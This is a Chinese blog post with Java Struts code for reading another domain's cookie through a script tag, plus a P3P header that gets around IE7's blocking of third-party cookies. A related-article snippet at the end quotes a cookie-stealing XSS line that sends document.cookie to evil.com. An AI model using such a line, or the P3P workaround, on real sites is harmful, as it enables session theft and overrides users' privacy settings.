java cookie p3p_P3P script src 解决cookie存取的跨域问题 java 终极解决办法

最新推荐文章于 2024-04-03 14:30:00 发布
最新推荐文章于 2024-04-03 14:30:00 发布
阅读量152 收藏
点赞数
文章标签: java cookie p3p
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36415206/article/details/115067757
版权

最近在做一个项目,我的网站是www.a.com,但是需要取到www.b.com网站的cookie,折腾了很久,在同事的合作下。总算搞定了。

我是用java做的, 首先在www.a.com/a.vm文件中加入这句话:

src中的链接可以是b中的一个页面或者一个Action,都可以,我是用一个Action的。在b.com的这个action中,我的代码如下:

public ActionForward getSidAndUserid(ActionMapping mapping, ActionForm form,

HttpServletRequest request, HttpServletResponse response) {

String cartSid = this.getCartSid(request, response);

UserSession userSession = this.getUserSession(request, response);

CartServiceDelegate delegate = new CartServiceDelegate();

int basketSize = delegate.getBasketSize(userSession, cartSid);

StringBuffer buffer = new StringBuffer();

buffer.append("iBacketItemsNumber=" + basketSize + ";");

PrintWriter out;

response.setHeader("P3P","CP=/"NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM

CNT PRE LOC/"");

response.setHeader("Pragma", "No-cache");

response.setHeader("Cache-Control", "no-cache");

try {

out = response.getWriter();

out.print(buffer.toString());

} catch (IOException e) {

log.error("",e);

}

return null;

}

这样就可以得到想要的结果。

在a.vm文件中,若查看源代码的话,会看到

然后a.vm中要取到这个数据可以写如下代码:

这样就可以得到想要的数据了。

附: 我在Action中加入以下代码的原因是: response.setHeader("P3P","CP=/"NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRE LOC/""); 因为在IE7中(IE6和Firfox都没有问题,只有IE7以上版本存在此问题),由于浏览器的隐私等级在IE7中默认为“中”,它会阻止保存可用来联系您的信息而没有您的明确同意的第三方Cookie。因此无法实现跨域取cookie的功能,除非用户手动把浏览器的隐私等级在IE7中默认为“低”。而以上的那行代码就可以解决这个问题,其中用到的是P3P技术。    写此篇文章,希望能对大家有所帮助。。。

云东来
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java程序员面试专栏 计算机基础】计算机网络 核心面试指引
MaoLin Tian's Blog
01-22 202
关于计算机网络部分的核心知识进行一网打尽,包括计算机的网络模型,各个层的一些重点概念,通过一篇文章串联面试重点,并且帮助加强日常基础知识的理解,全局思维导图如下所示
简单介绍 P3P 技术
gftygff的博客
11-10 5393
简单介绍 P3P 技术
java cookie p3p_使用P3P实现 跨域共享Cookie
weixin_39627052的博客
02-16 113
在www.a.com下放SetCookie.ashx,内容如下:/// /// $codebehindclassname$ 的摘要说明/// [WebService(Namespace = "http://tempuri.org/")][WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]public class SetCooki...
java cookie p3p_利用P3P实现单点登录和COOKIE的跨域读写
weixin_39753213的博客
02-16 140
首先说明,同一个顶级域名的情况我不说什么,很简单,就一个Cookie的Domain属性。下面来说顶级域名不同的情况。有时候我们会有这么一种需求:当我们登录A网站www.a.com时,同时也要能登录B网站www.b.com,继而访问B网站需要登录才能看到的信息。这个时候怎么办呢?那有人会说用SSO(单点登录)来做。SSO可能会有多种的实现方式,但是我们这里只介绍利用P3P来实现的方式。也就是如标题所...
java cookie p3p_P3P解决cookie存取跨域问题
weixin_39942637的博客
02-16 149
最近在做一个流量统计的东西的时候,偶然发现IE在对iframe里面的页面写Cookie的时候有一些安全限制,导致读取Cookie不成功,找了好长时间的解决办法,重要找到如下的办法:1.页面里的COOKIE不能是浏览器进程的COOKIE(包括验证票和不设置超时时间的COOKIE),否则跨域会取不到.这点做跨域COOKIE的人比较少提到.不过实际上留意下几家大学做的方案,有细微的提到他们的验证模块里的...
JavaScript对于Cookie的使用
由心说
10-11 534
Cookie包含多个互不相关的信息块: 名称 值 到期日期和时间 有效路径(默认为当前路径) 域(默认为当前主机) 创建Cookie JavaScript中的Cookie通过document对象的cookie属性访问。 document.cookie = value; Cookie值必须使用特定的语法,这种语法以cookieName=cookieValue开始。 //如:保存用户偏爱的字体大小 document.cookie = 'fontSize=12'; 上述代码发送的Cookie有默认的到.
P3P script src 解决cookie存取跨域问题 java 终极解决办法
群峰之巅的专栏
05-26 3944
    最近在做一个项目,我的网站是www.a.com,但是需要取到www.b.com网站的cookie,折腾了很久,在同事的合作下。总算搞定了。    我是用java做的, 首先在www.a.com/a.vm文件中加入这句话:/cart/forpersate.do?act=getSidAndUserid">    src中的链接可以是b中的一个页面或者一个Acti
P3P 和 跨域 (cross-domain) cookie 访问(读取和设置)
guo_yang的博客
12-06 486
在IE 里面跨域去设置 cookie跨域的实现,尝试了n中方法都不行,查了一下资料,可以通过设置header中的p3p值来实现,真不错:) 比如要访问b站在a站设置一个cookies,则可以这样做: 1.在b.com下建立一个文件cookies.htm 内容为: 复制代码代码如下: <script language="javascript" src="http://a.com...
response.setHeader("P3P","CP=CAO PSA OUR")
08-09
- *1* [P3P解决cookie存取跨域问题](https://blog.csdn.net/diemi9921/article/details/101895595)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
使用cookie实现跨域系统单点登录
热门推荐
Think In JAVA—Max
04-18 1万+
      上一篇博客介绍了单点登录的认证流程和实现,本文将介绍通过cookie实现单点登录。      单点登录作为目前比较流行的服务于企业业务整合的解决方案之一, 使得在多个应用系统中,用户只需要 登录一次 就可以访问所有相互信任的应用系统。实现这一需求的思路和技术各有千秋. 一、SSO 的主要实现方式有: 1、   共享 cookies 基于共享同域的 cookie 是
SRC实战-cookie注入漏洞
最新发布
zkaqlaoniao的博客
04-03 997
1.谷歌语法找到注入点2.判断注入是否存在3.通过cookie绕过注入4.爆破表名5.偏移注入查找表的字段数6.最后可以通过爆破目录查找登陆框,进入后台进一步渗透拿权限第一次投稿,觉得这次实战记录很适合新手小白挖SRC,希望多多支持!申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
通过设置P3P头来实现跨域访问COOKIE
经验之谈,不做搬运工
01-03 191
在firefox 和chrome下用script 调用setcookie页面可能轻松实玩跨域cookie设置,可在ie下就不行了,幸好可以通过设置p3p头信息实现。 在实际工作中,类似这样的要求很多,比如说,我们有两个域名,我们想实现在一个域名登录后,能自动完成另一个域名的登录,也就是PASSPORT的功能。 我只写一个大概,为了测试的方便,先编辑hosts文件,加入...
使用 P3P 规范让 IE 跨域接受第三方 cookie
海洋之心
10-24 1万+
前两天尝试使用 jsonp 跨域提交用户名密码请求,实现自动登录第三方网站,即 SSO(single-sign-on) 单点登录,一处登录处处登录。在 Firefox下没问题,IE 却不行。查看 HTTP 的几个来回,发现登录请求是成功的,问题出在第三方网站返回的 cookie (session id) IE 并没有接受,下一次发送请求时根本没有带上 cookie,说明之前的 Set-Cookie
使用p3p跨域设置Cookie
weixin_33845477的博客
11-09 171
有些时候不能将url上的参数传来传去,比如与调用某开放平台上的接口,这时候可能需要借助Cookie来进行处理了,但这里可能又涉及到跨域的问题。 如果浏览器开启了对Cookie的支持,按照Cookie RFC,它应该具有: 1、允许设置至少300个Cookie; 2、每个域允许至少设置20个Cookie(IE7/8-50个、FF-50个、Opera-...
java p3p_使用p3p跨域设置Cookie
weixin_35620837的博客
02-12 398
有些时候不能将url上的参数传来传去,比如与调用某开放平台上的接口,这时候可能需要借助Cookie来进行处理了,但这里可能又涉及到跨域的问题。如果浏览器开启了对Cookie的支持,按照Cookie RFC,它应该具有:1、允许设置至少300个Cookie;2、每个域允许至少设置20个Cookie(IE7/8-50个、FF-50个、Opera-30个);3、每个Cookie至少允许设置4095字节(...
Response的Header属性详解
chierb的博客
08-23 1711
Response的Header属性详解 一、Header属性 二、Header属性分类 1、通用信息头 2、请求头 3、响应头 4、实体头 5、扩展头 三、Response设置Header属性 1、控制浏览器禁止缓存当前文档内容 2、控制浏览器过期的时间期限 3、设置http响应头控制浏览器定时刷新网页(refresh) 4、设置http响应头控制浏览器定时跳转到其它页面 5、设置http响应头文件下载 一、Header属性 属性 备注 A.
对 eval(‘new Image().src=....ment.cookie) 的理解
hello world
03-04 469
前言 在web前端黑客技术揭秘的1.2中有这么个例子: eval('new Image().src="http://www.evil.com/steal.php?c="+escape(document.cookie)') 原文说: 当被攻击者被诱骗访问了该链接时, Cookies 会话信息就会被盗取到黑客的网站上,一 般情况下,黑客利用该 Cookies 可以登录被攻击者的账号,并进行越权操作。由此可以看 到,攻击的发生是因为注入了一段恶意的指令, 并且该指令能被执行 来具体分析下这句代码
p3p java_用P3P header解决iframe跨域访问cookie
06-03
在Web应用程序中使用P3P,可以允许浏览器在进行跨域访问时,自动向服务器发送包含隐私策略信息的请求头,从而解决了跨域访问cookie的问题。 在Java中,可以通过设置响应头参数来启用P3P。具体步骤如下: 1.在web....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值